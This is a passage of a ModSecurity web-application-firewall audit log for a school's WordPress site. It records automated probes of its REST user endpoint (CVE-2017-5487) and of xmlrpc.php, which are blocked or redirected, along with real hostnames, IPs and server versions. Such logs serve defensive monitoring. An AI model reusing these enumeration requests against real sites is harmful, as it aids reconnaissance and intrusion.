103.236.140.4 45262 103.236.140.4 8181 --006f9654-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --006f9654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --006f9654-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449303722433 3244 (- - -) Stopwatch2: 1747449303722433 3244; combined=1416, p1=485, p2=898, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --006f9654-Z-- --7cb55361-A-- [17/May/2025:09:35:09 +0700] aCf13XyxdQCiyU1ENFcojAAAAAE 103.236.140.4 45266 103.236.140.4 8181 --7cb55361-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.46.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.46.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7cb55361-C-- demo.sayHello --7cb55361-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7cb55361-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449309122824 4936 (- - -) Stopwatch2: 1747449309122824 4936; combined=3848, p1=478, p2=3106, p3=22, p4=90, p5=89, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7cb55361-Z-- --3805da1d-A-- [17/May/2025:09:35:59 +0700] aCf2D3yxdQCiyU1ENFcojQAAABc 103.236.140.4 45270 103.236.140.4 8181 --3805da1d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3805da1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3805da1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449359667041 3339 (- - -) Stopwatch2: 1747449359667041 3339; combined=1495, p1=509, p2=953, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3805da1d-Z-- --d333a24a-A-- [17/May/2025:09:36:07 +0700] aCf2F-m4kjNN-hEbWjJBtQAAAEE 103.236.140.4 45274 103.236.140.4 8181 --d333a24a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.197.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.197.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d333a24a-C-- demo.sayHello --d333a24a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d333a24a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449367143564 5719 (- - -) Stopwatch2: 1747449367143564 5719; combined=4177, p1=561, p2=3392, p3=33, p4=36, p5=93, sr=80, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d333a24a-Z-- --58d77002-A-- [17/May/2025:09:36:07 +0700] aCf2FwTOsBn9MSWb6WJvAAAAAJM 103.236.140.4 45276 103.236.140.4 8181 --58d77002-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58d77002-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58d77002-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449367779645 2584 (- - -) Stopwatch2: 1747449367779645 2584; combined=1237, p1=415, p2=793, p3=0, p4=0, p5=29, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58d77002-Z-- --d3e7904d-A-- [17/May/2025:09:36:13 +0700] aCf2HQTOsBn9MSWb6WJvAgAAAJY 103.236.140.4 45282 103.236.140.4 8181 --d3e7904d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.6 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d3e7904d-C-- demo.sayHello --d3e7904d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e7904d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449373707686 6701 (- - -) Stopwatch2: 1747449373707686 6701; combined=4820, p1=688, p2=3884, p3=42, p4=41, p5=98, sr=157, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3e7904d-Z-- --ed9b0b6c-A-- [17/May/2025:09:36:41 +0700] aCf2OQTOsBn9MSWb6WJvBQAAAIE 103.236.140.4 45288 103.236.140.4 8181 --ed9b0b6c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ed9b0b6c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed9b0b6c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449401369268 2496 (- - -) Stopwatch2: 1747449401369268 2496; combined=1131, p1=381, p2=721, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed9b0b6c-Z-- --1732850a-A-- [17/May/2025:09:36:48 +0700] aCf2QATOsBn9MSWb6WJvBwAAAIQ 103.236.140.4 45292 103.236.140.4 8181 --1732850a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1732850a-C-- demo.sayHello --1732850a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1732850a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449408008609 6467 (- - -) Stopwatch2: 1747449408008609 6467; combined=4662, p1=622, p2=3797, p3=39, p4=44, p5=96, sr=81, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1732850a-Z-- --d151e660-A-- [17/May/2025:09:36:50 +0700] aCf2QgTOsBn9MSWb6WJvCAAAAII 103.236.140.4 45294 103.236.140.4 8181 --d151e660-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.167 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d151e660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d151e660-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449410947866 2286 (- - -) Stopwatch2: 1747449410947866 2286; combined=1160, p1=395, p2=734, p3=0, p4=0, p5=31, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d151e660-Z-- --8af1fd1f-A-- [17/May/2025:09:36:55 +0700] aCf2RxKi5m5upc8uMd6iXAAAAMo 103.236.140.4 45300 103.236.140.4 8181 --8af1fd1f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --8af1fd1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8af1fd1f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449415113180 2080 (- - -) Stopwatch2: 1747449415113180 2080; combined=1044, p1=361, p2=654, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8af1fd1f-Z-- --83e40c15-A-- [17/May/2025:09:36:56 +0700] aCf2SATOsBn9MSWb6WJvCwAAAIs 103.236.140.4 45302 103.236.140.4 8181 --83e40c15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.100.167 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.100.167 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --83e40c15-C-- demo.sayHello --83e40c15-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --83e40c15-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449416288739 4518 (- - -) Stopwatch2: 1747449416288739 4518; combined=3527, p1=424, p2=2902, p3=24, p4=26, p5=89, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83e40c15-Z-- --2ac54a46-A-- [17/May/2025:09:37:00 +0700] aCf2TATOsBn9MSWb6WJvDQAAAIw 103.236.140.4 45306 103.236.140.4 8181 --2ac54a46-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2ac54a46-C-- demo.sayHello --2ac54a46-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ac54a46-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449420121679 5529 (- - -) Stopwatch2: 1747449420121679 5529; combined=4051, p1=485, p2=3346, p3=28, p4=30, p5=95, sr=71, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ac54a46-Z-- --754d371d-A-- [17/May/2025:09:37:53 +0700] aCf2gem4kjNN-hEbWjJBugAAAEw 103.236.140.4 45378 103.236.140.4 8181 --754d371d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --754d371d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --754d371d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449473834168 2942 (- - -) Stopwatch2: 1747449473834168 2942; combined=1276, p1=415, p2=827, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --754d371d-Z-- --f907865f-A-- [17/May/2025:09:38:00 +0700] aCf2iHyxdQCiyU1ENFcolQAAAA4 103.236.140.4 45434 103.236.140.4 8181 --f907865f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.36.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.36.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f907865f-C-- demo.sayHello --f907865f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f907865f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449480191783 5822 (- - -) Stopwatch2: 1747449480191783 5822; combined=4367, p1=553, p2=3466, p3=33, p4=35, p5=155, sr=73, sw=125, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f907865f-Z-- --7762d464-A-- [17/May/2025:09:38:15 +0700] aCf2lxKi5m5upc8uMd6iegAAAM0 103.236.140.4 45546 103.236.140.4 8181 --7762d464-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.193 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7762d464-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7762d464-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449495404839 2790 (- - -) Stopwatch2: 1747449495404839 2790; combined=1225, p1=432, p2=765, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7762d464-Z-- --36158d66-A-- [17/May/2025:09:38:25 +0700] aCf2oem4kjNN-hEbWjJBzQAAAFg 103.236.140.4 45594 103.236.140.4 8181 --36158d66-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.63.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.63.193 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --36158d66-C-- demo.sayHello --36158d66-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --36158d66-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747449505252149 5382 (- - -) Stopwatch2: 1747449505252149 5382; combined=3865, p1=502, p2=3160, p3=30, p4=33, p5=83, sr=65, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36158d66-Z-- --f85ae075-A-- [17/May/2025:09:38:44 +0700] aCf2tBKi5m5upc8uMd6ijAAAANc 103.236.140.4 45702 103.236.140.4 8181 --f85ae075-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f85ae075-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f85ae075-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747449524239804 3066 (- - -) Stopwatch2: 1747449524239804 3066; combined=1350, p1=436, p2=880, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) 